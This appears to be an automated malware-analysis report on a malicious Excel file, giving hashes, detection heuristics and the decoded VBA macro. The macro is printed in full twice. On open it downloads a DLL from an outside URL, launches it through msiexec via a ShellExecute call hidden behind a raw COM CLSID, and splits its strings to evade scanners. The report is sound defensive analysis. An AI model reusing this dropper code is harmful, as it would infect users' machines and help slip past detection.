Office (OLE) / .XLS malware analysis — malicious · cbb6424499752fd1

MALICIOUS

Office (OLE) / .XLS

63.0 KB Created: 2020-02-04 20:20:13 Authoring application: Microsoft Excel First seen: 2026-06-13

MD5: 38193054f2084290e2c6bc6e6e83ab18 SHA-1: b8f03d4868d5edee5d1c72a80fc6c001985518c8 SHA-256: cbb6424499752fd14ffd3fea692b88f9df206e227d2b596aa03a5a83ee491d84

350 Risk Score

Heuristics 10

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
```
VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION

VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
Matched line in script
```
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
```
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL

A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://9.com/testing/update.d� Referenced by macro
- https://9.com/testing/update.dllReferenced by macro
- https://9.com/testing/update.dReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1177 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1177 bytes
SHA-256: `02c66f889983e944e33dcfaaa9eb79b02724c3b4980905dedfea7ba7645b36d4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _ ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Sub auto_open() x = URLDownloadToFileA(0, "https://9.com/testing/update.d" & "ll", "C:\Tem" & "p\test.d" & "ll", 0, 0) Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") obj.Document.Application.ShellExecute "cmd", "/k msie" & "xec /z C:\Tem" & "p\test.d" & "ll && del C:\Tem" & "p\test.d" & "ll", "", Null, 0 End Sub

SHA-256: 02c66f889983e944e33dcfaaa9eb79b02724c3b4980905dedfea7ba7645b36d4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Sub auto_open()
x = URLDownloadToFileA(0, "https://9.com/testing/update.d" & "ll", "C:\Tem" & "p\test.d" & "ll", 0, 0)
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "cmd", "/k msie" & "xec /z C:\Tem" & "p\test.d" & "ll && del C:\Tem" & "p\test.d" & "ll", "", Null, 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.